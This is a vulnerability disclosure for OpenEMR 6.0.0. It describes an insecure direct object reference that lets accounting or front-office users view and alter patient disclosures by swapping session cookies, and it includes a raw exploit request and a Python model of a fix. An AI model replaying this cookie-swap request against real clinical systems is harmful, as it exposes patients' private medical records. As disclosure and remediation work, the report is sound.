Non-Privilege User Can View Patient’s Disclosures in openemr/openemr
Mar 28th 2022
Insecure Direct Object Reference
Non-privileged users (accounting, front office) can view a patient's disclosures and can add, edit and delete them. The Disclosures function is not shown to non-privileged users on the patient's dashboard, but such a user can send a GET request directly to the vulnerable endpoint and view it.
The endpoint https://localhost/openemr-6.0.0/interface/patient_file/summary/record_disclosure.php must check the session behind the OpenEMR cookie against the document parameters sent in the GET request, so that only cookies belonging to Admin or otherwise privileged users are allowed to view and use these features.
Aden Yap Chuen Zhen (email@example.com)
Rizan, Sheikh (firstname.lastname@example.org)
Ali Radzali (email@example.com)
Log in to OpenEMR as admin; Disclosures is visible in the patient's dashboard. Click on "Edit".
Now, using a non-admin account, e.g. an Accountant user, the patient's disclosures should not be viewable.
Using Burp, we intercept the Admin request to edit the patient's disclosures and swap the "OpenEMR" cookie for an Accountant cookie, and we are able to view the patient's disclosures.
The Raw Request looks like:
GET /openemr/interface/patient_file/summary/record_disclosure.php?editlid=3 HTTP/1.1
Host: 192.168.153.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.153.129/openemr/interface/main/tabs/main.php?token_main=KnYCfBmjS9pZH0KnzZ5exFXbcAxxhKUP2JZwnEFD
Cookie: OpenEMR=wXLcHx6rd0afp3JGFiB%2Cps94aa3icGyGvUi0DunXZ2YcFwuo
Upgrade-Insecure-Requests: 1
Non-privileged users also have the capability to add, edit or delete any patient's disclosures.
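A small model of the missing check, added here as an example and not OpenEMR's own code: the OpenEMR session cookie only identifies the user, and a role-based ACL must decide whether that user may view or edit disclosures. The session values, the role table and the mapping of editlid to a write action are constructed assumptions.

```python
# Added example (not OpenEMR's code). Models the flaw in the report: a valid
# session is proof of authentication, not of authorization. The vulnerable
# handler serves the disclosure form to any session; the hardened one also
# checks the caller's role against an ACL for the requested action.
from http import HTTPStatus
from typing import Dict, Optional, Set
from urllib.parse import parse_qs

# Constructed sample sessions: OpenEMR cookie value -> role. Values are made up.
SESSIONS: Dict[str, str] = {
    "admin-cookie-0001": "admin",
    "acct-cookie-0002": "accounting",
    "front-cookie-0003": "front_office",
}

# Constructed ACL: role -> permissions on patient disclosures. Roles missing
# here, or listed with no permissions, get no access at all (deny by default).
DISCLOSURE_ACL: Dict[str, Set[str]] = {
    "admin": {"view", "write"},
    "accounting": set(),
    "front_office": set(),
}


def cookie_role(cookie_header: str) -> Optional[str]:
    """Resolve the OpenEMR cookie in a Cookie header to a role, or None."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "OpenEMR":
            return SESSIONS.get(value)
    return None


def vulnerable_handler(query: str, cookie_header: str) -> int:
    """Vulnerable shape: any authenticated session reaches the form."""
    if cookie_role(cookie_header) is None:
        return HTTPStatus.UNAUTHORIZED
    return HTTPStatus.OK  # accounting and front office get the form too


def hardened_handler(query: str, cookie_header: str) -> int:
    """Hardened shape: authenticate, then authorize the specific action."""
    role = cookie_role(cookie_header)
    if role is None:
        return HTTPStatus.UNAUTHORIZED
    # Assumption: a request carrying editlid is an edit and needs "write";
    # a plain request only needs "view".
    needed = "write" if "editlid" in parse_qs(query) else "view"
    if needed not in DISCLOSURE_ACL.get(role, set()):
        return HTTPStatus.FORBIDDEN  # swapped-in Accountant cookie stops here
    return HTTPStatus.OK
```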